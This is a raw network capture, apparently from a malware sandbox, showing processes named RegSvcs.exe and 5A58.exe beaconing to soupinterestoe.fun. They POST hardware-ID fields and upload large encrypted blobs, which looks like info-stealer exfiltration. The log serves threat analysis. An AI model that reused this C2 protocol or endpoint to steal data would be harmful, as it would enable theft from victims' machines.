Dec 27, 2023 17:58:20.604520082 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=395pvu81p0fscd361i5gdhmu3l; expires=Sun, 21-Apr-2024 10:44:59 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lu1VEC0FVk2ObTdtVjHlmZF6dlFXl45b7MLI8HN8dHvNsHEpCY%2Fv75risvaBw78x4MS7kKQxHroW43zh8rw0TUiXzq4eVWFfAVE86TF9fbjarW3A7fknyKfSkM7avDXN7tHnbbI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b94bb966b5 Data Raw: Data Ascii:
Dec 27, 2023 17:58:20.604535103 CET	35	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: -DFW15Malformed packet data
Dec 27, 2023 17:58:20.604553938 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49835	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:20.995351076 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 841 Host: soupinterestoe.fun
Dec 27, 2023 17:58:20.995417118 CET	841	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:21.386149883 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=49mphrrneop1qlh3732g6o7gi3; expires=Sun, 21-Apr-2024 10:45:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d9MVZGtvAHGPyQKjaEAVzAUKAqouj2LKKkaVOSH%2B4Jj3aqFyYr0UQ6thODq60SuXwY2gpGzxThgH2RZIlQ6GBROQJUAmb0aKo23gaXUkqcmuZdSSRXnlBLXqNERMsfYh5iYMahs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b999a6f479 Data Raw: Data Ascii:
Dec 27, 2023 17:58:21.386179924 CET	28	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: -DFWfok 212.102.41.2
Dec 27, 2023 17:58:21.386194944 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49836	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:21.230921984 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 11895 Host: soupinterestoe.fun
Dec 27, 2023 17:58:21.231209993 CET	11895	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:21.647707939 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=lc9glfkltkqcottigiv2ieuj77; expires=Sun, 21-Apr-2024 10:45:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JuSsJMKoalVUfV0vizL5Ux6mowqoI76NJyKdzTktWFrGI5fdweuUfGUZ4iST9CW%2BaiLpdrDWwRoLfbTPkHYEhRRjgiEpRF0uYtWRmAv5ooNKSeYcc7HnBSmOm06qAyQwMaNqJFY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b9b1cc86ba Data Raw: Data Ascii:
Dec 27, 2023 17:58:21.647735119 CET	28	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: -DFWfok 212.102.41.2
Dec 27, 2023 17:58:21.647747993 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49837	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:22.825196981 CET	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 423422 Host: soupinterestoe.fun
Dec 27, 2023 17:58:22.825500965 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:22.946371078 CET	1286	OUT	Data Raw: 02 17 bb d7 74 4a 20 01 21 df 74 8f 43 2a 41 72 fb e2 51 b4 da 51 0a f9 13 ed 02 20 f9 24 fb 0e d8 b6 e3 5d 6b fd f9 e3 bc 36 89 29 40 2f 8c 8e 30 06 11 c4 85 65 0f 21 cb 43 ad e4 ac c1 70 11 0b 51 a8 0c 1b 63 3f 85 95 b1 5c b5 60 c5 f9 45 51 fb Data Ascii: tJ !tC*ArQQ $]k6)@/0e!CpQc?\`EQU>,x+FX#p$V\|LhyKjn B<0a2K:4s`[XPV)~D?cNe3LSP/8Yd@O-TMS='~l"uPl}6
Dec 27, 2023 17:58:22.946803093 CET	2572	OUT	Data Raw: 28 53 66 ce 96 65 70 ea 9c db 4a fd a2 c7 a6 e4 6b 17 7f b0 7f 22 50 33 ce 53 9f b2 a3 b3 43 55 6b 65 db 8e bd ab 1d f1 5a f4 ed 83 cf e7 12 81 b5 4a 8d 6e 45 9e 8f d5 48 f5 b9 8a 82 d9 51 03 0e ff fc 07 f3 43 e9 66 06 53 bc 8e b4 fb 31 97 9d 62 Data Ascii: (SfepJk"P3SCUkeZJnEHQCfS1bCSeESXm[}+QhR\|]n;Kx4^~#$u<+v"epD?JY(x# UaXBzk<JS`}j`x8M
Dec 27, 2023 17:58:22.947330952 CET	2572	OUT	Data Raw: c6 b8 ad ed eb e7 ce 1c f6 9d 40 62 50 8b cc d8 e8 54 8e f4 63 91 dc b9 e4 7d c6 4a 3a fc cf 3a 34 a3 c9 83 9d 96 fb dd b6 3c 8b a6 51 b3 52 3f fd d4 29 c5 ff 2a 62 42 93 1b a3 25 7f f8 6a b6 e8 ec f5 30 cd 6a 41 35 98 68 28 cc 9f 1a 2e 1c 90 be Data Ascii: @bPTc}J::4<QR?)bB%j0jA5h(.P%ZtDh-Pm!0Nv09Wm\`YmG%A}2O{i)@S=2zfH^CSo*9,:p'NG~t=
Dec 27, 2023 17:58:22.947753906 CET	9002	OUT	Data Raw: e4 45 ed 69 32 8e 09 36 5a 50 40 f5 bc d3 19 de fe 2f 9c 8c 60 bc 25 c2 4f 52 6d c2 bd 98 86 3f a8 c1 2d c8 2f 7c 44 43 3c 6b d2 2a 32 b3 45 fe 35 77 55 7d 88 73 8b aa cb c8 ec b1 56 d7 a8 ee fa 68 d1 9d 51 50 52 a5 a2 07 95 a5 9c 12 dc f2 51 8c Data Ascii: Ei26ZP@/`%ORm?-/\|DC<k*2E5wU}sVhQPRQfViVGO$o@S xpIg<5\4g_7U"q8UV;_40 s;ZHb fUB V%Nv0= >P}@qK+e~:YL&)a`/
Dec 27, 2023 17:58:22.947788000 CET	9002	OUT	Data Raw: cd 8f 7f c8 26 2c 05 13 7b 2c 28 96 b4 2b ca e9 06 e8 97 7a 36 c9 da f4 78 6d f6 d4 c3 10 9d e9 5a 98 99 2a 26 f3 58 f2 83 5e 51 12 82 34 2c f5 72 8a 12 b5 44 b9 02 02 21 5f fc a6 3a aa 1d 4e 23 6d fa b0 82 da 9f 2d 59 7e 9b 53 55 08 db 0a ec 22 Data Ascii: &,{,(+z6xmZ*&X^Q4,rD!_:N#m-Y~SU"#,4Mg9yc/vMDT%oy]^'M@b-d0,C@@'Mp{6nsaX/[M&L-bfcL'LPBG~Mf_
Dec 27, 2023 17:58:23.067485094 CET	2572	OUT	Data Raw: 9e cd 04 3d 9e 07 86 20 92 bf 11 25 b9 a3 46 c4 e9 f1 5a c0 5d ad 88 29 21 01 10 10 a6 5a 99 cc ad 5b bd 45 45 cf 55 a1 c0 eb 2d d6 97 d2 bd c1 dd b1 1c 4f 2c 6a e5 a5 26 c6 9c a4 d5 12 fa 01 93 fe af 1c d5 fb 1c c5 45 ea 8f fb 49 e0 63 e0 bc 98 Data Ascii: = %FZ])!Z[EEU-O,j&EIcB>V,2nm]oTZD^^nLuj7&!xReJ\|4n%fGo?M+Y/S4)*.)]e"s9i--c6/"]s&0B^ `+=E!
Dec 27, 2023 17:58:23.067851067 CET	5144	OUT	Data Raw: 2b 22 d3 d6 7a c6 db 54 ad 8e 3d fa 78 f3 03 f7 bc 83 bf 7f 21 09 17 b2 65 56 9b d4 2a e9 85 c6 6f 5b b5 10 e5 be 59 2b fb 74 30 a5 68 51 77 8d ed 68 95 99 ba 9e 01 d0 f3 ec 90 df 65 33 9c 96 17 d5 76 07 a6 fd f9 0e d4 58 5f 1f 19 b0 e3 4b c5 40 Data Ascii: +"zT=x!eV*o[Y+t0hQwhe3vX_K@[_p7F[x8>V6Ou?x["uyy>cdOS{K?/oF7ME[mEO>\|HlRD9C;_mpI!i
Dec 27, 2023 17:58:23.068535089 CET	5144	OUT	Data Raw: af 65 0c aa b1 55 46 63 40 71 a8 e2 ce d2 6e 30 ac 3d a0 fc ed 7c 28 17 78 be c4 85 c0 c1 42 10 e2 69 0c f5 c9 ba d1 b4 38 40 d8 4a 0b f7 48 63 c6 b5 88 8d 06 a5 06 ee 0a 33 75 98 1c dd 85 20 72 7b 49 66 8a 3a ea a7 b6 f0 c8 54 be dc b2 7a 0c e1 Data Ascii: eUFc@qn0=\|(xBi8@JHc3u r{If:TzXddd4:qw#i^l@>^2k5N8B\CO:cIL[EB&]_fr(Y-^9R)/n>j8PG$_>D<
Dec 27, 2023 17:58:23.068890095 CET	2572	OUT	Data Raw: 49 83 f6 5b 24 c8 f1 ad 75 04 31 6f 3e f3 9f 71 7c dc 32 69 ed 84 c0 81 cb 27 2e 65 50 f9 3b 07 0d 95 e3 49 7c ab 59 4f b9 b5 47 fd 7a 03 41 23 3b 67 9b 61 e3 54 57 59 fc 05 58 92 57 79 14 2f 89 a6 a7 19 4c da c3 6a 85 1e 1e f1 26 79 51 c0 98 aa Data Ascii: I[$u1o>q\|2i'.eP;I\|YOGzA#;gaTWYXWy/Lj&yQZW7!3jb)9m\8-MZ{A3WlU=4{\|D6l0Y=95Lw&_8~.gY'S0PK~uZ2)_A,YF
Dec 27, 2023 17:58:26.198142052 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=qifk05qml87k27lg6d4ddtcf6i; expires=Sun, 21-Apr-2024 10:45:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UopXNCWz%2Br1pIXl%2BwSq3Xqv7O2hz6F4DmdkSZg3JV%2FCpCWVdxEV53QWvgL%2Boii5zZtwCWbevThohsuvmJ%2BHbCkAUvb9zCXHYQqm8zwF1BFaNNphd%2BUG6WuIccdw3vYNdzQt3x9I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49838	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:22.920109987 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:22.920331955 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:23.460483074 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=72enjru3oiutkg2qivlu63b6qe; expires=Sun, 21-Apr-2024 10:45:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwMeFxMTKeqiImDdy9kkZokKk7twDvuRLKnzQflibxoXGapgqEWfybbUpDOIvnOZbQjnqiZClFA2vPcheKjL%2FcidVDDukXchICS7IulhXOGysubm%2FMLhZAeAZDnk1K4iiQ4TUEM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ba5a8a31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:23.460503101 CET	37	IN	Data Raw: 33 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3e-DFW15Malformed packet data
Dec 27, 2023 17:58:23.460628033 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49841	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:24.194663048 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:24.194856882 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:24.574074984 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=omoc17hct6mlu49gli1iuarp8r; expires=Sun, 21-Apr-2024 10:45:03 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5B%2BeG879In%2BAJpBjuRcS0%2B1sE9jT9%2FJ5viQHD8faKMp7I5yEmibYQZWg39lsYtLtK5TfcNtzlXHZfhcBE5b%2Brttrz0AWw6bfvKlO%2BBy6VLSNLtpKZsan%2F2WZTWFg9YjuOfOJ%2BeQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:24.574096918 CET	49	IN	Data Raw: 63 33 31 62 61 64 61 63 36 38 36 62 38 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31badac686b89-DFW15Malformed packet data
Dec 27, 2023 17:58:24.574110985 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49843	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:25.811351061 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:25.811532974 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:26.202392101 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=mqf3qo5q1u3k438cvgfucsps8m; expires=Sun, 21-Apr-2024 10:45:05 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=skvqc8UvAFGUd9gHcWlTRX8gIJjXVmqlm%2BR8XeFuMZ%2B7Adm7HDxNIHwaFba%2Be3X5v1zf%2BoUw1B80rehDxPXCyrLPrR%2Bb9bVGFd%2FJH89X2k%2BiFmKQdO1aeHqLqP%2BmbnFzXg37kWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:26.202409029 CET	49	IN	Data Raw: 63 33 31 62 62 37 62 65 37 35 65 37 38 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31bb7be75e786-DFW15Malformed packet data
Dec 27, 2023 17:58:26.202429056 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49845	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:27.017307997 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
